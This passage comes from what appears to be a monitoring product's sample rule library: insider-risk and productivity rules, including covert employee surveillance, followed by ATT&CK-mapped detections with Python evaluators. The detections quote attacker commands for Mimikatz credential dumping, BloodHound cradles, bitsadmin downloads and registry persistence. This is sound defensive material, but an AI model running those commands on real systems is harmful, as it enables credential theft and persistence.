This rule fires when tor.exe is launched (exact match). The Notify action alerts the designated administrator with no user-facing message, enabling a covert first look before escalating.
System Driver Tampering
Modifying driver files in C:\Windows\System32\drivers can disable security software, intercept system calls, or establish kernel-level persistence. Any write or deletion in this directory warrants immediate investigation.
This rule fires on Write or Delete operations on .sys files in c:\windows\system32\drivers, or on Copy operations originating from that directory. The Notify action alerts the administrator.
System Hosts File Edited
The Windows hosts file controls local DNS resolution. Modifying it can redirect domain lookups to attacker-controlled servers, enabling phishing, credential harvesting, or C2 communication.
This rule fires on any Write operation to the exact path c:\windows\system32\drivers\etc\hosts. The Notify action alerts the administrator immediately.
Email Contains Credit Card Content Downloaded from SharePoint
This rule combines file origin tracking with content inspection to detect a specific high-risk scenario: a user downloads a file containing credit card data from SharePoint and then sends it externally via email.
This rule fires when an outgoing email is sent and the content contains a credit card number (any count), where the file's origin URL matches sharepoint.our-domain.com. The Notify action alerts the administrator. (Replace the SharePoint URL with your organization's domain.)
Email or IM with Accusative Statements
Accusatory communications sent over email or IM can signal interpersonal conflicts, workplace misconduct, or pre-litigation disputes. Detecting these patterns early allows HR and legal teams to intervene before situations escalate.
This rule uses a rich set of regex patterns to detect accusatory phrases in outgoing emails and IMs, including patterns like "you were not authorized", "you messed up", "I didn't authorize", "you didn't follow my instructions", and similar expressions of blame or grievance. The Notify action alerts the designated administrator.
Taking a Screenshot of Sensitive Information
Screenshots are the most common method for capturing sensitive information displayed in web applications. This rule specifically targets screenshot activity while a known sensitive CRM contact page is open.
This rule fires when snippingtool.exe is active AND the current webpage URL contains a specific contact list URL (ui.cogmento.com/contacts). Both conditions must be met simultaneously. The Notify action alerts the administrator.
After Hours Alert
Any system login outside of normal business hours, particularly a fresh login rather than a screen unlock, represents a risk that warrants real-time notification to security or IT management.
This rule fires when a user logs in fresh (not a screen unlock) before 7:00 AM or after 7:00 PM. The Notify action sends an email to the configured security contact with details of the after-hours session.
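The three login-time rules on this page (this alert, the Insider Risk Login Hours block, and the second after-hours instance) differ only in their permitted window and in whether screen unlocks count. The added Python example below is not Teramind's code; it expresses the three rules as data and evaluates constructed login events. It treats each permitted window as half-open, so a login exactly at the closing time is outside the window, which is an assumption about how the product handles the boundary.

```python
from dataclasses import dataclass
from datetime import datetime, time


@dataclass(frozen=True)
class LoginRule:
    name: str
    permitted_start: time   # window during which logins are NOT reported
    permitted_end: time
    include_unlocks: bool   # whether screen unlocks count as logins
    action: str


RULES = [
    # Sample Policy: After Hours Alert (before 07:00 or after 19:00, fresh logins only)
    LoginRule("after-hours-alert", time(7, 0), time(19, 0), False, "notify"),
    # Insider Risk: Login Hours (permitted 05:40-19:20, unlocks included, blocked)
    LoginRule("login-hours", time(5, 40), time(19, 20), True, "block"),
    # Second instance: alerts 00:00-10:00 and 18:00-24:00, i.e. permitted 10:00-18:00
    LoginRule("after-hours-second-instance", time(10, 0), time(18, 0), False, "notify"),
]


@dataclass(frozen=True)
class LoginEvent:
    ts: datetime
    screen_unlock: bool


def in_window(t: time, start: time, end: time) -> bool:
    """Half-open window [start, end); also handles windows that cross midnight."""
    if start <= end:
        return start <= t < end
    return t >= start or t < end


def evaluate(ev: LoginEvent) -> list:
    fired = []
    for rule in RULES:
        if ev.screen_unlock and not rule.include_unlocks:
            continue
        if not in_window(ev.ts.time(), rule.permitted_start, rule.permitted_end):
            fired.append(f"{rule.name}:{rule.action}")
    return fired


# Constructed events (local time of the endpoint).
SAMPLES = [
    LoginEvent(datetime(2024, 3, 4, 6, 30), False),   # early fresh login
    LoginEvent(datetime(2024, 3, 4, 12, 15), True),   # lunchtime unlock
    LoginEvent(datetime(2024, 3, 4, 21, 5), True),    # evening unlock
    LoginEvent(datetime(2024, 3, 4, 23, 59), False),  # late fresh login
    LoginEvent(datetime(2024, 3, 5, 19, 0), False),   # exactly 19:00
]

if __name__ == "__main__":
    for ev in SAMPLES:
        print(ev.ts, "unlock" if ev.screen_unlock else "login", evaluate(ev))
```

The evening unlock shows the practical difference between the rules: it is silent for both notification rules but blocked by Login Hours, because only that rule counts unlocks. Before enabling a Block on login time, decide which clock applies (the endpoint's local time versus the server's) for travelling staff, since the rule data carries no time zone.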
Running Software from External Media or Cloud Drives
Executing programs directly from USB drives or cloud-synced folders (like Dropbox or OneDrive) bypasses standard software installation controls and can introduce untrusted code to the endpoint.
This rule fires when an executable file (.exe, .bat, .com, .msi, .ps1) is accessed from an external drive (%EXTERNALDRIVES%) or from a cloud-synced folder (Dropbox, Google Drive, OneDrive, Box). The Block action prevents execution and the Notify action alerts the administrator.
Email Contains Content Downloaded from SharePoint
Any email sent outside the organization that contains content originating from SharePoint represents a potential data leakage event: the content may have been extracted specifically for the purpose of sending it externally.
This rule fires when an outgoing email contains content (in body or attachment) where the file's origin URL matches sharepoint.our-domain.com. The Notify action alerts the administrator. (Replace with your SharePoint URL.)
Email Attachment Monitoring
Tracking outbound emails with specific file types provides visibility into what kinds of documents employees are sharing externally, enabling targeted review of high-risk attachment types.
This rule fires when an outgoing email contains an attachment with a name ending in .pdf, .bat, .zip, or .docx. The Notify action alerts the designated security contact.
Data Deletion Prevention & Alerting
Mass file deletions, whether accidental or malicious, represent a significant risk of data loss. This rule both prevents the deletion and ensures that an administrator is notified immediately.
This rule fires when a Delete operation is detected on any file across all drives (%ALLDRIVES%) or external drives (%EXTERNALDRIVES%). The Block action prevents the deletion from completing and the Notify action alerts the assigned administrator.
Social Media +50 Minutes
Excessive time spent on social media during work hours represents a productivity drain. This rule provides a time-based enforcement mechanism that automatically redirects users after they exceed the permitted daily usage limit.
This rule fires when the user has spent more than 50 minutes (3,000 seconds) on facebook.com or youtube.com in a single day. The Warn action displays a message to the user and the Redirect action automatically navigates them away from the site to google.com.
Windows Events
Windows security events contain critical audit information about authentication, session management, and system state changes. This rule creates Teramind alert records correlated with key Windows Event IDs.
This rule fires when any of the following Windows Log Events are generated: 4624 (successful logon), 4625 (failed logon), 4647 (user-initiated logoff), 4634 (logoff), 6009 (unexpected restart), 1074 (shutdown initiated), 6006 (clean shutdown), or 6008 (unexpected shutdown). The Notify action alerts the administrator.
Clipboard Copy Sensitive Data & Paste Outside Domain
Copying data from an internal SharePoint page and pasting it into an external website is a targeted exfiltration technique that bypasses file-level DLP controls entirely.
This rule fires when clipboard content originates from sharepoint.our-domain.com and is pasted into any page that does not belong to our-domain.com. The Notify action alerts the administrator of the cross-domain clipboard operation.
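The host-matching logic behind this rule, as an added example (not Teramind's own code): "belongs to our-domain.com" is decided on the parsed hostname rather than by substring, which is the check a practitioner needs so that lookalike hosts are still treated as external. The URLs and event list are constructed; our-domain.com is the placeholder the page uses.

```python
"""
Added example: evaluate "Clipboard Copy Sensitive Data & Paste Outside Domain"
criteria against (source URL, destination URL) pairs. Not Teramind's code; the
CORPORATE_DOMAIN placeholder and the sample events are constructed.
"""
from urllib.parse import urlsplit

CORPORATE_DOMAIN = "our-domain.com"                 # placeholder from the page
SENSITIVE_SOURCE_HOST = "sharepoint." + CORPORATE_DOMAIN


def hostname(url: str) -> str:
    """Lower-cased hostname of a URL, with scheme, port, credentials and path removed.
    A bare 'host/path' string without a scheme is accepted too."""
    if "//" not in url:
        url = "//" + url
    host = urlsplit(url).hostname  # already lower-cased, port stripped
    return (host or "").rstrip(".")


def belongs_to(host: str, domain: str) -> bool:
    """True when host is exactly domain or a subdomain of it.
    A plain substring test would wrongly accept 'notour-domain.com' and
    'our-domain.com.attacker.example' as internal; a suffix test on the
    dotted boundary does not."""
    domain = domain.lower()
    return host == domain or host.endswith("." + domain)


def is_cross_domain_paste(source_url: str, destination_url: str) -> bool:
    """The rule's two criteria: the clipboard content came from the SharePoint
    host AND the paste target is a page outside the corporate domain."""
    if hostname(source_url) != SENSITIVE_SOURCE_HOST:
        return False
    return not belongs_to(hostname(destination_url), CORPORATE_DOMAIN)


# Constructed clipboard events: (copy-source page, paste-destination page).
SAMPLE_EVENTS = [
    ("https://sharepoint.our-domain.com/sites/finance/Q3.docx",
     "https://mail.example.com/compose"),                    # external: flag
    ("https://sharepoint.our-domain.com/sites/finance/Q3.docx",
     "https://intranet.our-domain.com/wiki"),                # internal subdomain: ok
    ("https://SharePoint.Our-Domain.com:443/sites/hr/list",
     "https://our-domain.com.attacker.example/paste"),       # lookalike host: flag
    ("https://docs.our-domain.com/handbook",
     "https://mail.example.com/compose"),                    # not from SharePoint: ok
]


def flagged_destinations(events) -> list:
    """Return the destination hostnames of events the rule would notify on."""
    return [hostname(dst) for src, dst in events if is_cross_domain_paste(src, dst)]


if __name__ == "__main__":
    for host in flagged_destinations(SAMPLE_EVENTS):
        print("cross-domain clipboard paste to", host)
```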
Email Contains SSN
Social Security Numbers are among the most regulated categories of PII. Any outbound email containing an SSN, in body or attachment, must be immediately flagged for compliance review.
This rule uses the Personal Content (SSN) classifier to detect Social Security Numbers in outgoing emails. One or more SSN matches triggers the Notify action, alerting the designated administrator.
Remote Desktop Access Applications
Third-party remote desktop tools that provide inbound access to endpoints can be exploited by external parties or used by employees to grant unauthorized access to corporate systems.
This rule fires when any of the known remote desktop clients (teamviewer, gotomeeting, vnc, or logmein) are launched by application name. The Block action prevents the application from running and the Notify action alerts the administrator.
Save a File to Removable Media
Writing corporate files to USB drives or other removable media is a primary physical exfiltration vector. This rule ensures every such event is logged and the user is warned.
This rule fires when a Write operation is detected on any file targeting %EXTERNALDRIVES%. The Warn action displays a message informing the user they have saved a file to external media, and the Notify action simultaneously alerts the administrator.
Incoming Email from Known Competitors
Receiving email from a competitor's domain may indicate recruitment attempts, social engineering, or intelligence gathering. Early detection allows the organization to respond proactively.
This rule fires when an incoming email is received from an address containing @my-competitor.com. Update this field with your actual competitor domains or a Shared List. The Notify action alerts the administrator.
Anonymous Browsing
Private/incognito browsing mode is used by employees to avoid local browsing history and may also be used to circumvent some web filters. Detecting its use provides visibility into this behavior.
This rule fires when any webpage is visited in private/incognito mode (privateMode = true). The Notify action alerts the designated user's manager without any user-facing message, enabling covert review.
PII: Social Security Number + Name
The combination of a name and a Social Security Number is the minimum dataset required for identity theft. This rule detects this specific combination across all common exfiltration vectors.
This rule fires when both a person's name (English) AND an SSN are detected together in any of the following activities: file uploads outside the corporate domain, file writes, file copies, outgoing emails to external addresses, or clipboard operations outside the authorized CRM application or corporate domain. The Notify action alerts the administrator.
Outbound Email with Attachment to a Different Domain
All outbound emails with attachments sent to recipients outside the corporate domain represent a potential data leakage event and should be logged for audit purposes.
This rule fires when an outgoing email contains an attachment and is sent to any address that does not contain @my-domain.com. The Notify action alerts the administrator once per event.
Large Print Job
Large print jobs may represent an employee creating physical copies of bulk data, such as documents, records, or reports, for removal from the office.
This rule fires when a print job of 60 or more pages is submitted. The Notify action alerts the designated administrator.
Outgoing Email Contains a Resume
Sending a CV or resume from a corporate email account is a strong behavioral indicator of an employee actively pursuing external opportunities, an important flight risk signal.
This rule fires when an outgoing email contains an attachment with a name containing "resume" or "cv". The Notify action alerts the designated administrator.
Block External Drives
In high-security environments, all external drive access may need to be completely prohibited to prevent any physical data exfiltration or malware introduction via removable media.
This rule fires on any file operation (Access, Rename, Write, Delete, folder operations, Copy) involving %EXTERNALDRIVES%. The Block action prevents the operation from completing and the Notify action alerts the administrator.
Teamviewer Launch Attempt
TeamViewer provides a persistent remote access channel that bypasses network access controls. Blocking it entirely on corporate devices ensures that remote access is only possible through authorized, monitored channels.
This rule fires whenever teamviewer is detected in the application name. The Block action immediately terminates the launch.
Upload to Cloud Drive (SSN Detection)
Files containing Social Security Numbers uploaded to SharePoint represent an elevated risk, particularly when those files may then be shared with external parties via SharePoint links.
This rule fires when an SSN is detected in a file being uploaded to teramind.sharepoint.com. The Notify action alerts the designated administrator.
Email Contains Offensive Content
Hostile or offensive emails sent from corporate accounts create workplace safety, HR, and legal liability risks. Detecting this content before it causes harm enables timely intervention.
This rule uses regex patterns to detect highly offensive phrases in outgoing emails, including variations of "you fucked up", "what the hell happened", "piece of shit", and other expressions of workplace hostility. The Notify action alerts the designated administrator.
RDP Attempt to Forbidden Hosts
Preventing RDP connections to unauthorized subnets ensures that sensitive servers or networks are not accessed from workstations that should not have that privilege.
This rule fires when mstsc.exe (Microsoft Remote Desktop) attempts a connection to any host not in the allowed subnet (10.120.150.0/24). The Block action prevents the connection and the Notify action alerts the administrator.
File Sharing / Peer-to-Peer (P2P) Apps
P2P applications represent a compliance, security, and bandwidth risk. Detecting known torrent and P2P clients enables enforcement of acceptable use policies.
This rule fires when any of the following are detected in the application name: torrent, gnutella, edonkey, limewire, napster, kazaa. The Notify action alerts the administrator.
6. Unproductive Behavior Rules
This policy monitors and responds to unproductive behavior patterns, including job searching, excessive idle time, and other indicators of disengagement or resignation intent.
Job Search Websites
Time spent on job-search platforms during work hours is a direct productivity concern and a behavioral indicator of disengagement or departure intent.
This rule fires when a user visits known job-search sites including glassdoor, careerbuilder, monster.com, indeed.com, theladders.com, or dice.com as a full page visit (not background resource load). The Warn action displays a message to the user and the Notify action alerts the designated administrator.
Resignation Intent via AI Tools
Employees sometimes use AI tools to help draft resignation letters, update LinkedIn profiles, or ask career transition questions, all while at work. Detecting this intent early provides HR with advance notice.
This rule fires when the word "Resignation" is typed while the active tab is on chatgpt.com, chatgpt, perplexity.ai, or gemini.google.com. The Notify action sends an email alert to the configured HR or management contact.
Pasting Text Containing .onion Links
Dark web .onion links pasted into or from files on corporate drives represent a significant security concern: employees may be communicating with threat actors or accessing illegal marketplaces.
This rule fires when clipboard content containing the text .onion is involved in any file operation (read or write) on either local drives (%ALLDRIVES%) or external drives (%EXTERNALDRIVES%). The Block action prevents the file operation from completing.
Idle Time: Unproductive Behavior
Extended idle periods during work hours represent a productivity concern. This rule enforces a minimum activity standard by warning employees who have been idle for more than 30 minutes.
This rule uses an Agent-Based Schedule criterion to detect when a user has been idle for more than 1,860 seconds (31 minutes) during any period of the day. The Warn action displays a message to the user: "You have been idle for more than 30 minutes. Please return to work immediately. Continued idle time may result in disciplinary action."
7. TA0001 Initial Access
This policy covers MITRE ATT&CK Tactic TA0001 (Initial Access): the techniques adversaries use to gain a first foothold in a network.
The rules in this policy are designed to detect the earliest stages of an attack, before the adversary can establish persistence or move laterally.
T1091 Replication Through Removable Media
Adversaries use removable media as an infection vector by placing malicious autorun.inf files on USB drives that execute automatically when the drive is inserted into a new system.
This rule fires when an autorun.inf file is accessed on an external drive (excluding drive R:), or when the PowerShell command New-Item -Path $Drive is executed from the command line, a technique used to programmatically create autorun entries on inserted media. No action beyond logging is configured by default.
8. TA0002 Execution
This policy covers MITRE ATT&CK Tactic TA0002 (Execution): the techniques used to run malicious code on a system. Detecting execution activity provides a critical second layer of defense after initial access has occurred.
T1059.006 Command and Scripting Interpreter: Python
Python is a powerful scripting language increasingly used in attacks. Any Python execution on an endpoint not authorized for development warrants logging.
This rule fires when python.exe is launched. No action beyond logging is configured by default (severity 70).
T1053 Scheduled Task/Job: Scheduled Task Startup Script
Creating scheduled tasks that run at logon or startup is a common persistence and execution technique used by both attackers and legitimate software. All such creations should be audited.
This rule fires when schtasks /create with /sc onlogon or /sc onstart parameters is detected from the command line, or when the Task Scheduler MMC snap-in is opened. No action beyond logging is configured by default.
T1047 Windows Management Instrumentation
WMI is a powerful Windows subsystem frequently abused by attackers for code execution, reconnaissance, and lateral movement. Any wmic command-line invocation should be logged.
This rule fires when any command-line argument containing wmic is detected. A Notify action with a daily threshold of 1 alerts the Main Admin (severity 80).
T1059.005 Command and Scripting Interpreter: Visual Basic
VBScript files (.vbs) are commonly used in phishing payloads and malicious macros. Detecting their access or execution provides early warning of script-based attacks.
This rule fires when a .vbs file is accessed on any drive, or when a command-line argument contains .vbs. No action beyond logging is configured by default.
T1053.002 Scheduled Task/Job: At (Windows)
The legacy at.exe Windows task scheduler is sometimes used by attackers to execute code at a specific future time, making it harder to correlate with the initial compromise.
This rule fires when at.exe is run from the command line. No action beyond logging is configured by default.
T1059.001 Command and Scripting Interpreter: PowerShell (Mimikatz CradleCraft PsSendKeys)
This specific PowerShell command is a known Mimikatz delivery technique that uses a complex series of keystrokes to load and execute the credential dumping tool via Notepad, avoiding direct PowerShell download.
This rule fires when the exact Mimikatz CradleCraft command string is detected in command-line arguments. No action beyond logging is configured (severity 85), but the specificity of this indicator makes it a near-certain confirmation of credential theft activity.
T1059.001 Command and Scripting Interpreter: PowerShell
Any PowerShell invocation from the command line, when it does not originate from Microsoft Teams, is logged once per day as a general PowerShell execution baseline.
This rule fires when a command-line argument contains powershell (excluding msteams). A daily Notify action with a threshold of 1 alerts the Main Admin.
T1059.003 Command and Scripting Interpreter: Windows Command Shell
Batch scripts and direct command shell invocations (.bat, .cmd, /c switch) are a fundamental execution mechanism for both legitimate automation and attacks.
This rule fires when command-line arguments contain .bat, .cmd, or /c (excluding URLs containing //c). No action beyond logging is configured by default.
T1053 Scheduled Task/Job: WMI Invoke-CimMethod
Invoke-CimMethod with the PS_ScheduledTask namespace is a stealthier method of creating scheduled tasks that bypasses some security monitoring focused only on schtasks.exe.
This rule fires when Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace is detected in command-line arguments. No action beyond logging is configured.
T1059.001 Command and Scripting Interpreter: PowerShell (Mimikatz)
This rule detects a direct PowerShell download-and-execute technique for Mimikatz, using IEX and Net.WebClient.DownloadString to load the credential dumper directly into memory.
This rule fires when command-line arguments contain the PowerShell DownloadString Mimikatz URL or Invoke-Mimikatz -DumpCreds. No action beyond logging is configured (severity 85).
T1569.002 System Services: Service Execution
services.exe and sc.exe are used by both legitimate administrators and attackers to install and execute Windows services, a common persistence and execution vector.
This rule fires when command-line arguments contain services.exe or sc.exe, or when the MMC Services snap-in is opened. No action beyond logging is configured.
T1053.005 Scheduled Task/Job: Scheduled Task
Detecting schtasks /create with on-logon or on-start triggers covers the most common malicious scheduled task persistence patterns.
This rule fires when schtasks /create /tn /sc onlogon or /sc onstart /ru system is detected from the command line, or via the Task Scheduler MMC snap-in. No action beyond logging is configured.
T1059.001 PowerShell: BloodHound (Local Disk)
BloodHound is an Active Directory reconnaissance tool used by both red teams and attackers to map attack paths to domain admin. Detecting its local execution is a high-confidence indicator of active AD enumeration.
This rule fires when PowerShell arguments contain import-module SharpHound.ps1 or Invoke-BloodHound -OutputDirectory $env:Temp. No action beyond logging is configured (severity 85).
T1053.005 Scheduled Task/Job: Scheduled Task Local
This rule captures additional variants of scheduled task creation commands using regex matching to cover all schtasks create with onlogon, once, or onstart triggers.
This rule fires when command-line arguments match schtasks.*create.*onlogon, schtasks.*create.*once, or schtasks.*create.*onstart, or via the Task Scheduler MMC snap-in. No action beyond logging is configured.
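The command-line criteria described in this policy (the schtasks create regexes, the PowerShell rule with its msteams exclusion, the Windows Command Shell rule with its //c exclusion, the wmic and at.exe rules) translated into a small evaluator, as an added example that is not Teramind's code. The regular expressions are my reading of the prose, the severities and daily thresholds are those quoted on the page, and the sample command lines are constructed.

```python
"""
Added example: apply several TA0002 command-line rules to captured process
command lines and report which rule names fire, with a daily Notify threshold
modelled for the rules that have one. Not Teramind's code; regex translations
of the prose are assumptions, sample command lines are constructed.
"""
import re
from dataclasses import dataclass
from datetime import date
from typing import Optional


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern                 # fires when this matches the command line
    exclude: Optional[re.Pattern] = None  # suppresses the hit when this also matches
    severity: int = 0                   # as quoted on the page; 0 where none is given
    daily_threshold: int = 0            # 0 = log only; N = notify at most N times/day


RULES = [
    # T1053.005 Scheduled Task Local: schtasks create with onlogon, once or onstart.
    Rule("T1053.005 Scheduled Task Local",
         re.compile(r"schtasks.*create.*(onlogon|once|onstart)", re.I)),
    # T1059.001 PowerShell: any "powershell" on the command line, excluding msteams.
    Rule("T1059.001 PowerShell", re.compile(r"powershell", re.I),
         exclude=re.compile(r"msteams", re.I), daily_threshold=1),
    # T1059.003 Windows Command Shell: .bat, .cmd, or a /c switch. The /c token must
    # not be preceded by another slash or a word character (so "https://c..." and
    # "/create" are not hits) and must be followed by whitespace, a quote or end of
    # line (so "/c/docs" inside a URL is not).
    Rule("T1059.003 Windows Command Shell",
         re.compile(r'\.bat\b|\.cmd\b|(?<![/\w])/c(?=[\s"\']|$)', re.I)),
    # T1047 WMI: any wmic invocation; Notify with a daily threshold of 1, severity 80.
    Rule("T1047 WMI", re.compile(r"wmic", re.I), severity=80, daily_threshold=1),
    # T1053.002 At (Windows): the legacy at.exe scheduler.
    Rule("T1053.002 At", re.compile(r"\bat\.exe\b", re.I)),
]
RULE_INDEX = {rule.name: rule for rule in RULES}


def evaluate(cmdline: str) -> list:
    """Names of the rules whose criteria match this command line, in RULES order."""
    hits = []
    for rule in RULES:
        if rule.pattern.search(cmdline) and not (rule.exclude and rule.exclude.search(cmdline)):
            hits.append(rule.name)
    return hits


class DailyNotifier:
    """Models a Notify action with a daily threshold: at most N alerts per rule per day.
    Hits beyond the threshold are still logged by the caller, just not alerted."""

    def __init__(self) -> None:
        self._sent = {}  # (rule name, day) -> alerts already sent

    def notify(self, rule: Rule, day: date) -> bool:
        """Return True when an alert should be sent for this rule on this day."""
        if rule.daily_threshold <= 0:
            return False  # log-only rule
        key = (rule.name, day)
        if self._sent.get(key, 0) >= rule.daily_threshold:
            return False
        self._sent[key] = self._sent.get(key, 0) + 1
        return True


# Constructed sample of (day, command line) records, as a monitoring agent might log them.
SAMPLE_RECORDS = [
    (date(2024, 1, 15), "cmd.exe /c whoami"),
    (date(2024, 1, 15), "chrome.exe https://contoso.com/c/docs"),          # URL, not a /c switch
    (date(2024, 1, 15), "powershell.exe -File msteams-setup.ps1"),         # excluded by msteams
    (date(2024, 1, 15), "powershell.exe -NoProfile -Command Get-Date"),
    (date(2024, 1, 15), "powershell.exe -NoProfile -Command Get-Process"),  # second hit same day
    (date(2024, 1, 15), r"schtasks /create /tn Backup /sc onlogon /tr C:\Tools\backup.exe"),
    (date(2024, 1, 15), "wmic process list brief"),
]


def process(records) -> list:
    """Return (day, command line, rule name, notified) for every hit in the records."""
    notifier = DailyNotifier()
    out = []
    for day, cmdline in records:
        for name in evaluate(cmdline):
            out.append((day, cmdline, name, notifier.notify(RULE_INDEX[name], day)))
    return out


if __name__ == "__main__":
    for day, cmdline, name, notified in process(SAMPLE_RECORDS):
        print(day, "NOTIFY" if notified else "log   ", name, "<-", cmdline)
```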
T1059.001 PowerShell: Invoke-AppPathBypass
This specific command is an Application Whitelisting bypass technique that uses a known-vulnerable application path to launch cmd.exe with elevated privileges.
This rule fires when the exact Invoke-AppPathBypass PowerShell command string is detected. No action beyond logging is configured (severity 85).
T1059.001 PowerShell: BloodHound (Memory / Download Cradle)
This variant executes BloodHound's SharpHound ingestor directly from GitHub into memory using a download cradle, leaving no file on disk and evading file-based detection.
This rule fires when PowerShell arguments contain the BloodHound IEX download cradle from the GitHub URL or Invoke-BloodHound. No action beyond logging is configured (severity 85).
9. TA0003 Persistence
This policy covers MITRE ATT&CK Tactic TA0003 (Persistence): the techniques adversaries use to maintain access after reboots, credential changes, or other interruptions. These rules monitor registry modifications, startup locations, account creation, service installation, and other persistence mechanisms.
T1197 BITS Jobs: Bitsadmin Download (cmd)
Background Intelligent Transfer Service (BITS) is a legitimate Windows service frequently abused by malware to download payloads in the background while appearing to be normal system activity.
This rule fires when bitsadmin.exe /transfer /Download /priority Foreground is detected in command-line arguments. No action beyond logging is configured (severity 90).
T1547.001 Boot or Logon Autostart: SystemBC Registry
SystemBC is a malware-as-a-service proxy tool used in many ransomware campaigns. It establishes persistence by writing to the Registry Run key.
This rule fires when PowerShell commands targeting a $RunKey variable and Set-ItemProperty on that key are detected. No action beyond logging is configured (severity 85).
T1547.001 Boot or Logon Autostart: Suspicious .jse File in Startup Folder
JScript encoded files (.jse) placed in the Windows Startup folder execute automatically at every logon, providing simple, persistent code execution.
This rule fires when command-line arguments reference startup folder paths in combination with cscript.exe and .jse file operations, or when Copy-Item .jse is detected. No action beyond logging is configured (severity 85).
T1547.001 Boot or Logon Autostart: Add Persistence via Recycle Bin
This technique hijacks the Recycle Bin shell extension by overwriting its registry open\command value, causing arbitrary code to execute whenever the Recycle Bin is opened.
This rule fires when the specific reg ADD "HKCR\CLSID\{645FF040...}\shell\open\command" command is detected. No action beyond logging is configured (severity 85).
T1547.001 Boot or Logon Autostart: PowerShell Registry RunOnce
Adding entries to the RunOnce registry key causes a command to execute once the next time a user logs in, a common technique for delayed payload delivery after initial access.
This rule fires when $RunOnceKey = or set-itemproperty $RunOnceKey "NextRun" is detected in command-line arguments. No action beyond logging is configured (severity 85).
T1547.014 Boot or Logon Autostart: Active Setup
The Active Setup registry key runs commands for each user the first time they log in after the key is created, making it an effective per-user persistence mechanism.
This rule fires when HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ is referenced in command-line arguments. No action beyond logging is configured (severity 70).
T1547.004 Boot or Logon Autostart: Winlogon Helper DLL
Winlogon Helper DLL hijacking replaces legitimate DLLs loaded by the Windows logon process, providing system-level persistence that executes before the user desktop loads.
This rule fires when the Winlogon registry paths are referenced in command-line arguments. No action beyond logging is configured (severity 90).
T1547.001 Boot or Logon Autostart: Suspicious .bat File in Startup Folder
Batch files placed in the Windows Startup folder run automatically at every logon, providing a simple persistence mechanism.
This rule fires when command-line arguments contain Copy-Item .bat targeting startup folder paths, or when cscript.exe is invoked with startup folder paths and .bat extensions. No action beyond logging is configured (severity 85).
T1197 BITS Jobs: desktopimgdownldr.exe
desktopimgdownldr.exe is a LOLBin (Living Off the Land Binary) that can download files from the internet while disguised as a desktop wallpaper update, a BITS abuse technique.
This rule fires when cmd /c desktopimgdownldr.exe /lockscreenurl: is detected in command-line arguments. No action beyond logging is configured (severity 90).
T1136.002 Create Account: Domain Account
Creating new domain accounts is a persistence technique that gives attackers a durable foothold even after their initial compromised account is disabled.
This rule fires when New-ADUser or net user /add is detected in command-line arguments, or when the MMC "New Object - User" dialog is opened. No action beyond logging is configured (severity 75).
T1547.001 Boot or Logon Autostart: Suspicious .vbs File in Startup Folder
VBScript files in the Startup folder provide script-based persistence that can be harder to detect than executable persistence.
This rule fires when Copy-Item .vbs targeting startup folders, or cscript.exe with startup folder paths, are detected. No action beyond logging is configured (severity 85).
T1078.001 Valid Accounts: Default Accounts
Re-enabling the built-in Windows Administrator account (which is disabled by default) gives attackers a privileged, well-known account that is often overlooked in security monitoring.
This rule fires when net user /active:yes is detected in command-line arguments, the command used to activate a disabled Windows account. No action beyond logging is configured (severity 75).
T1197 BITS Jobs: Persist, Download & Execute
This comprehensive BITS detection rule covers the full attack chain: creating a BITS job, adding a file, setting a notification command, resuming the job, and completing it, a pattern used to download and execute malware.
This rule fires when any of the BITS lifecycle commands (bitsadmin /create, /addfile, /setnotifycmdline, /resume, /complete) are detected. No action beyond logging is configured (severity 90).
T1546.007 Event Triggered Execution: Netsh Helper DLL
Registering a malicious DLL as a Netsh helper causes it to load whenever netsh.exe is invoked, providing stealthy, event-triggered persistence.
This rule fires when HKLM\SOFTWARE\Microsoft\Netsh is referenced in command-line arguments or when add helper is detected. No action beyond logging is configured (severity 80).
T1547.003 Boot or Logon Autostart: Time Providers
The W32Time service's time provider registry key can be hijacked to load a malicious DLL whenever the Windows Time service starts, a subtle persistence mechanism.
This rule fires when HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\ is referenced in command-line arguments. No action beyond logging is configured (severity 80).
T1547.001 Boot or Logon Autostart: Registry Run Keys / Startup Folder
This comprehensive rule covers all major Windows Run key locations used for persistence, one of the most commonly abused mechanisms by malware.
This rule fires when any of the major HKCU\Software\Microsoft\Windows\CurrentVersion\Run*, HKLM\Software\Microsoft\Windows\CurrentVersion\Run*, startup folder, Winlogon, or Session Manager paths are referenced in command-line arguments. No action beyond logging is configured (severity 95).
T1547.001 Boot or Logon Autostart: Reg Key RunOnce
Adding a specific RunOnceEx key entry with a DLL path causes the DLL to be loaded on the next logon, a variant of RunOnce persistence that supports DLL loading.
This rule fires when REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d is detected. No action beyond logging is configured (severity 85).
T1546.003 Event Triggered Execution: WMI Event Subscription
WMI Event Subscriptions can trigger arbitrary code execution when system events occur, providing highly persistent and difficult-to-detect fileless malware execution.
This rule fires when mofcomp.exe, Get-WMIObject -Namespace, WMI-Persistence, or the regex wmic.*namespace are detected. No action beyond logging is configured (severity 90).
T1137 Office Application Startup: Outlook as C2
Configuring Outlook's macro security settings and creating .bas files in the Outlook directory establishes a command-and-control channel through email, using Outlook's VBA capabilities.
This rule fires when commands modifying Outlook's security registry key or creating files in %APPDATA%\Microsoft\Outlook\ are detected. No action beyond logging is configured (severity 80).
T1137.002 Office Application Startup: Office Test
The HKCU\Software\Microsoft\Office test\Special\Perf registry key loads any DLL specified in its value every time an Office application starts, a rarely-used but effective persistence mechanism.
This rule fires when reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" is detected. No action beyond logging is configured (severity 70).
T1547.001 Reg Key Run
Adding a value to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via REG ADD is the most direct and common form of per-user registry persistence.
This rule fires when REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" is detected in command-line arguments. No action beyond logging is configured (severity 95).
T1574.010 Hijack Execution Flow: Services File Permissions Weakness
Modifying UAC policy settings can silently disable User Account Control, removing a critical elevation prompt barrier and enabling attackers to execute privileged operations without user consent dialogs.
This rule fires when policy system registry values for ConsentPromptBehaviorUser or EnableInstallerDetection are modified via command line. No action beyond logging is configured (severity 85).
T1547.001 Boot or Logon Autostart: Executable Shortcut Link in User Startup Folder
